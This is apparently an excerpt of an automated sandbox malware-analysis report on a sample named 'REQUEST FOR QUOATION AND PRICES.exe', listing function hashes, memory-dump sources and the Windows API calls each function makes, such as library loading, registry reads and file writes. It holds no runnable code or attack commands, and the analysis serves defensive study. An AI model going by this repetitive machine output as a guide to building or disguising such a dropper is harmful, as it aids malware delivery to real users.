                                                                                                                                • Instruction ID: bb31d40f455f6cff8f0b7d4569728449f81f985eb729d97d8cba9c35205a948c
                                                                                                                                • Opcode Fuzzy Hash: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                                                                                • Instruction Fuzzy Hash: A6814471E04228CBDF24CFA8C844BADBBB1FF44305F25816AD456BB281C7789996DF44
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                                                                • Instruction ID: e59bb743c0d69fedc8ec9c1b53f92d0ee49f9853fc7f4c6d73f4ee5c7875ed1f
                                                                                                                                • Opcode Fuzzy Hash: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                                                                • Instruction Fuzzy Hash: FE816671E04228DBDF24CFA8C8447ADBBB0FF44305F15816AD856BB281C7786996DF44
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                                                                                • Instruction ID: 9556348457f1f5f1301c48e47fc8538a45dff02eab8277f34011f15b85b09a92
                                                                                                                                • Opcode Fuzzy Hash: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                                                                                • Instruction Fuzzy Hash: 43711271E00228DBDF28CF98C854BADBBB1FF48305F15806AD816BB281C7789996DF54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
                                                                                                                                • Instruction ID: ef61438920200bd82941886013112b5956151ce3a95704f571d29bdd470ffe0d
                                                                                                                                • Opcode Fuzzy Hash: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
                                                                                                                                • Instruction Fuzzy Hash: FF713571E00228DBDF28CF98C854BADBBB1FF44305F15806AD856BB291C7789996DF44
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                                                                                • Instruction ID: 0528ad5c4640a45b82c18dce6d1929194436f5f2edf35a138e23b2c729619556
                                                                                                                                • Opcode Fuzzy Hash: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                                                                                • Instruction Fuzzy Hash: AD714671E00228DBDF28CF98C854BADBBB1FF44305F15806AD816BB291C778AA56DF44
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FC3
                                                                                                                                  • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                  • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                  • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                  • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                  • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                  • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                  • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                                                                                                • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 334405425-0
                                                                                                                                • Opcode ID: ec4ed1b09714f1aa9f835f2dbd5309446028e52bc8e450eb177df983279e41a5
                                                                                                                                • Instruction ID: 2e01ab74a4c934f7e6015694823d512690d69bb111ffb1ad89b514660c000c84
                                                                                                                                • Opcode Fuzzy Hash: ec4ed1b09714f1aa9f835f2dbd5309446028e52bc8e450eb177df983279e41a5
                                                                                                                                • Instruction Fuzzy Hash: 65219871904215F6CF106F95CE48ADEBAB4AB04358F70417BF601B51E0D7B94D41DA6D
                                                                                                                                APIs
                                                                                                                                • GlobalFree.KERNEL32(00541600), ref: 00401B92
                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BA4
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$AllocFree
                                                                                                                                • String ID: Call
                                                                                                                                • API String ID: 3394109436-1824292864
                                                                                                                                • Opcode ID: fa756fabfd28fe389d560697bb7080b79a52f5873eaf941668f0573c6073e784
                                                                                                                                • Instruction ID: 0d74e211bf3f77f63613a954a16e526c6d046d9130d490d95d437df5f5263094
                                                                                                                                • Opcode Fuzzy Hash: fa756fabfd28fe389d560697bb7080b79a52f5873eaf941668f0573c6073e784
                                                                                                                                • Instruction Fuzzy Hash: 2F2196B2604501ABCB10EB94DE8599FB3A8EB44318B24053BF541B32D1D778AC019FAD
                                                                                                                                APIs
                                                                                                                                • SetFilePointer.KERNELBASE(00000000), ref: 10002927
                                                                                                                                • GetLastError.KERNEL32 ref: 10002A2E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1661666940.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1661650069.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1661681060.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1661697008.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_10000000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                • Opcode ID: 56b0631d48e3d5b058df37f2c0bf37a0ba3bd5c787ddc121e10f68fdc3118472
                                                                                                                                • Instruction ID: 346bc7c3d20138bcfc700b2b1684b28c90b224d1e8b0175626a50a5a3d135241
                                                                                                                                • Opcode Fuzzy Hash: 56b0631d48e3d5b058df37f2c0bf37a0ba3bd5c787ddc121e10f68fdc3118472
                                                                                                                                • Instruction Fuzzy Hash: 0E51A2BA905215DFFB10DFA4DC8275937A8EB443D4F22C42AEA049721DCF34A991CB55
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000001FD,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsz829B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3677997916-0
                                                                                                                                • Opcode ID: 73cf7011403a251bc8a8568549cb6b978d79a09763c44604493d81e759c4a0f6
                                                                                                                                • Instruction ID: d36666ef43ed86f5efc63e353f879872970ea39244a0d469f35bb849977519d9
                                                                                                                                • Opcode Fuzzy Hash: 73cf7011403a251bc8a8568549cb6b978d79a09763c44604493d81e759c4a0f6
                                                                                                                                • Instruction Fuzzy Hash: 3A117371915205EEDF14CFA0C6889AFB7B4EF40359F20843FE042A72D0D7B85A41DB5A
                                                                                                                                APIs
                                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                • Opcode ID: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                                                                                                • Instruction ID: f7aa54b913f5ca68b4de92db4f2492a915771a0f44b2d9fd206d2c7cbab0d3a4
                                                                                                                                • Opcode Fuzzy Hash: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                                                                                                • Instruction Fuzzy Hash: B501F431724210ABE7295B789C05B6A3698E720314F10853FF911F72F1DA78DC138B4D
                                                                                                                                APIs
                                                                                                                                • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$EnableShow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1136574915-0
                                                                                                                                • Opcode ID: be98ff442c713d64b2aef3360118115c19863b97becbdb99d22bcda0d6aeac62
                                                                                                                                • Instruction ID: 4da21f5269aa326e6de85e385cb401583d451f1930efd1289825586750b78c36
                                                                                                                                • Opcode Fuzzy Hash: be98ff442c713d64b2aef3360118115c19863b97becbdb99d22bcda0d6aeac62
                                                                                                                                • Instruction Fuzzy Hash: 84E08CB2B04104DBDB50AFF4AA889DD7378AB90369B20087BF402F10D1C2B86C008E3E
                                                                                                                                APIs
                                                                                                                                • GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe,80000000,00000003), ref: 00405B5A
                                                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 415043291-0
                                                                                                                                • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                                                                                • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                                                                                                                • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                                                                                • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                                                                                                APIs
                                                                                                                                • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402713
                                                                                                                                  • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FilePointerwsprintf
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 327478801-0
                                                                                                                                • Opcode ID: 9c9351cd5493f6acb52240965b0f8c81d6de1eb3f207cde75e45128e5fdd4ef9
                                                                                                                                • Instruction ID: 7b0a8f507568a188bd2c0a80d79ed85a493e53c174130335dce059ea839ee6d0
                                                                                                                                • Opcode Fuzzy Hash: 9c9351cd5493f6acb52240965b0f8c81d6de1eb3f207cde75e45128e5fdd4ef9
                                                                                                                                • Instruction Fuzzy Hash: 13E01AB1B15114ABDB01ABE59D49CEEB66DEB00319F20043BF101B00D1C27989019E7E
                                                                                                                                APIs
                                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
